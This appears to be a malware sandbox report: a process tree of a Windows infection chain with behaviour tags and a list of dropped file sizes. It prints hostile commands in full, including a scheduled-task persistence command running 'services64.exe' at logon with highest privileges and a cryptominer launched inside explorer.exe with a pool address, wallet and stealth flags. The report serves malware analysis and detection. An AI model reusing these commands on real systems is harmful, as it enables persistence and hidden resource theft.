C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exeC:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" /prefetch:7 --monitor-self --monitor-self-argument=--type=crashpad-handler "--monitor-self-argument=--user-data-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" --monitor-self-argument=/prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Calculator\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" --annotation=plat=Win64 --annotation=prod=Calculator --annotation=ver=0.0.13 --initial-client-data=0x23c,0x240,0x244,0x218,0x248,0x7ffe65b5dec0,0x7ffe65b5ded0,0x7ffe65b5dee09⤵
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exeC:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" /prefetch:7 --no-periodic-tasks --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Calculator\User Data\Crashpad" --annotation=plat=Win64 --annotation=prod=Calculator --annotation=ver=0.0.13 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7ff7c7e19e70,0x7ff7c7e19e80,0x7ff7c7e19e9010⤵
-
-
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1896,80753844509417779,6353119896529124255,131072 --lang=ja --service-sandbox-type=utility --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw7476_1673857109" --mojo-platform-channel-handle=1972 /prefetch:89⤵
-
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1896,80753844509417779,6353119896529124255,131072 --lang=ja --service-sandbox-type=network --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw7476_1673857109" --mojo-platform-channel-handle=1960 /prefetch:89⤵
-
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=gpu-process --field-trial-handle=1896,80753844509417779,6353119896529124255,131072 --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw7476_1673857109" --start-stack-profiler --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --mojo-platform-channel-handle=1912 /prefetch:29⤵
-
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=renderer --no-sandbox --file-url-path-alias="/gen=C:\Users\Admin\AppData\Roaming\Calculator\gen" --js-flags=--expose-gc --no-zygote --register-pepper-plugins=widevinecdmadapter.dll;application/x-ppapi-widevine-cdm --field-trial-handle=1896,80753844509417779,6353119896529124255,131072 --lang=ja --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw7476_1673857109" --nwjs --extension-process --ppapi-flash-path=pepflashplayer.dll --ppapi-flash-version=32.0.0.223 --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --mojo-platform-channel-handle=2508 /prefetch:19⤵
-
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=renderer --no-sandbox --file-url-path-alias="/gen=C:\Users\Admin\AppData\Roaming\Calculator\gen" --js-flags=--expose-gc --no-zygote --register-pepper-plugins=widevinecdmadapter.dll;application/x-ppapi-widevine-cdm --field-trial-handle=1896,80753844509417779,6353119896529124255,131072 --lang=ja --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw7476_1673857109" --nwjs --extension-process --ppapi-flash-path=pepflashplayer.dll --ppapi-flash-version=32.0.0.223 --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --mojo-platform-channel-handle=2704 /prefetch:19⤵
-
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=gpu-process --field-trial-handle=1896,80753844509417779,6353119896529124255,131072 --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw7476_1673857109" --start-stack-profiler --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=3368 /prefetch:29⤵
-
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1896,80753844509417779,6353119896529124255,131072 --lang=ja --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw7476_1673857109" --mojo-platform-channel-handle=3380 /prefetch:89⤵
-
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1896,80753844509417779,6353119896529124255,131072 --lang=ja --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw7476_1673857109" --mojo-platform-channel-handle=3900 /prefetch:89⤵
-
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1896,80753844509417779,6353119896529124255,131072 --lang=ja --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw7476_1673857109" --mojo-platform-channel-handle=3668 /prefetch:89⤵
-
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1896,80753844509417779,6353119896529124255,131072 --lang=ja --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw7476_1673857109" --mojo-platform-channel-handle=3080 /prefetch:89⤵
-
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1896,80753844509417779,6353119896529124255,131072 --lang=ja --service-sandbox-type=utility --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw7476_1673857109" --mojo-platform-channel-handle=3076 /prefetch:89⤵
-
-
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Mon209b3da1556b9a317.exe4⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\7zS444B4626\Mon209b3da1556b9a317.exeMon209b3da1556b9a317.exe5⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"6⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\inst1.exe"C:\Users\Admin\AppData\Local\Temp\inst1.exe"7⤵
- Executes dropped EXE
-
-
C:\Users\Admin\AppData\Local\Temp\DownFlSetup110.exe"C:\Users\Admin\AppData\Local\Temp\DownFlSetup110.exe"7⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Roaming\1290819.scr"C:\Users\Admin\AppData\Roaming\1290819.scr" /S8⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Users\Admin\AppData\Roaming\7371162.scr"C:\Users\Admin\AppData\Roaming\7371162.scr" /S8⤵
- Executes dropped EXE
- Adds Run key to start application
-
C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"9⤵
-
-
-
C:\Users\Admin\AppData\Roaming\8767698.scr"C:\Users\Admin\AppData\Roaming\8767698.scr" /S8⤵
- Executes dropped EXE
-
-
C:\Users\Admin\AppData\Roaming\5286563.scr"C:\Users\Admin\AppData\Roaming\5286563.scr" /S8⤵
-
-
C:\Users\Admin\AppData\Roaming\7939230.scr"C:\Users\Admin\AppData\Roaming\7939230.scr" /S8⤵
-
-
C:\Users\Admin\AppData\Roaming\7529472.scr"C:\Users\Admin\AppData\Roaming\7529472.scr" /S8⤵
-
-
-
C:\Users\Admin\AppData\Local\Temp\Soft1ww01.exe"C:\Users\Admin\AppData\Local\Temp\Soft1ww01.exe"7⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3272 -s 16768⤵
- Program crash
-
-
-
C:\Users\Admin\AppData\Local\Temp\4.exe"C:\Users\Admin\AppData\Local\Temp\4.exe"7⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 3932 -s 15488⤵
- Program crash
- Suspicious use of AdjustPrivilegeToken
-
-
-
C:\Users\Admin\AppData\Local\Temp\setup.exe"C:\Users\Admin\AppData\Local\Temp\setup.exe"7⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\is-IV99R.tmp\setup.tmp"C:\Users\Admin\AppData\Local\Temp\is-IV99R.tmp\setup.tmp" /SL5="$6011C,140785,56832,C:\Users\Admin\AppData\Local\Temp\setup.exe"8⤵
- Executes dropped EXE
- Loads dropped DLL
-
C:\Users\Admin\AppData\Local\Temp\setup.exe"C:\Users\Admin\AppData\Local\Temp\setup.exe" /SILENT9⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\is-6QG7G.tmp\setup.tmp"C:\Users\Admin\AppData\Local\Temp\is-6QG7G.tmp\setup.tmp" /SL5="$102B8,140785,56832,C:\Users\Admin\AppData\Local\Temp\setup.exe" /SILENT10⤵
-
C:\Users\Admin\AppData\Local\Temp\is-G0KAJ.tmp\postback.exe"C:\Users\Admin\AppData\Local\Temp\is-G0KAJ.tmp\postback.exe" ss111⤵
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Chrome 5.exe"C:\Users\Admin\AppData\Local\Temp\Chrome 5.exe"7⤵
- Executes dropped EXE
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit8⤵
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'9⤵
- Creates scheduled task(s)
-
-
-
C:\Users\Admin\AppData\Roaming\services64.exe"C:\Users\Admin\AppData\Roaming\services64.exe"8⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit9⤵
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'10⤵
- Creates scheduled task(s)
-
-
-
C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"9⤵
-
-
C:\Windows\explorer.exeC:\Windows\explorer.exe --cinit-find-x -B --algo=rx/0 --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr-eu2.nanopool.org:14433 --user=41o1Bi5waqLgbkV653RD7zSYeXSWRu1wnEDzPgFDFwntSnuRx7g4HbHPqNDGS6BW1bget6yyHyrPbBcVsdR6Ebxd843bMuK.add/password --pass= --cpu-max-threads-hint=30 --cinit-remote-config="v4Qq47ngFyBcSyO2uLKc6O4DG/ZgkwoY7/pmBv4ks3wJ7PR9JPsLklOJLkitFc6Y" --cinit-idle-wait=5 --cinit-idle-cpu=70 --tls --cinit-stealth9⤵
-
-
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Mon20b6f9d5bd03a305.exe4⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\7zS444B4626\Mon20b6f9d5bd03a305.exeMon20b6f9d5bd03a305.exe5⤵
- Executes dropped EXE
-
-
-
-
-
C:\Windows\system32\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global1⤵
- Process spawned unexpected child process
-
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global2⤵
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k SystemNetworkService1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k SystemNetworkService1⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 3344 -s 4962⤵
- Program crash
-
-
C:\Users\Admin\AppData\Local\Temp\B23B.exeC:\Users\Admin\AppData\Local\Temp\B23B.exe1⤵
-
C:\Windows\System32\IME\SHARED\imebroker.exeC:\Windows\System32\IME\SHARED\imebroker.exe -Embedding1⤵
-
C:\Windows\system32\compattelrunner.exeC:\Windows\system32\compattelrunner.exe -m:aeinv.dll -f:UpdateSoftwareInventoryW1⤵
-
C:\Users\Admin\AppData\Roaming\ubeivtgC:\Users\Admin\AppData\Roaming\ubeivtg1⤵
-
C:\Users\Admin\AppData\Roaming\hbeivtgC:\Users\Admin\AppData\Roaming\hbeivtg1⤵
-
C:\Windows\System32\IME\SHARED\imebroker.exeC:\Windows\System32\IME\SHARED\imebroker.exe -Embedding1⤵
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
4KB
-
Filesize
856KB
-
Filesize
19.2MB
-
Filesize
80KB
-
Filesize
1.3MB
-
Filesize
4KB
-
Filesize
1.6MB
-
Filesize
8KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
1.6MB
-
Filesize
100KB
-
Filesize
1.5MB
-
Filesize
572KB
-
Filesize
1.5MB
-
Filesize
572KB
-
Filesize
152KB
-
Filesize
100KB
-
Filesize
572KB
-
Filesize
100KB
-
Filesize
1.5MB
-
Filesize
100KB
-
Filesize
1.5MB
-
Filesize
19.2MB
-
Filesize
856KB
-
Filesize
1.3MB
-
Filesize
72KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
84KB
-
Filesize
4KB
-
Filesize
456KB
-
Filesize
1.6MB
-
Filesize
1.6MB
-
Filesize
4KB
-
Filesize
8KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
6.0MB
-
Filesize
856KB
-
Filesize
500KB
-
Filesize
868KB
-
Filesize
18.8MB
-
Filesize
1.3MB
-
Filesize
64KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
456KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
1.6MB
-
Filesize
4KB
-
Filesize
8KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
8KB
-
Filesize
4KB
-
Filesize
116KB
-
Filesize
192KB
-
Filesize
124KB
-
Filesize
4KB
-
Filesize
8KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
18.9MB
-
Filesize
4KB
-
Filesize
456KB
-
Filesize
18.8MB
-
Filesize
288KB
-
Filesize
6.0MB
-
Filesize
80KB
-
Filesize
4KB
-
Filesize
372KB
-
Filesize
1.0MB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
8KB
-
Filesize
456KB
-
Filesize
308KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
472KB
-
Filesize
5.0MB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB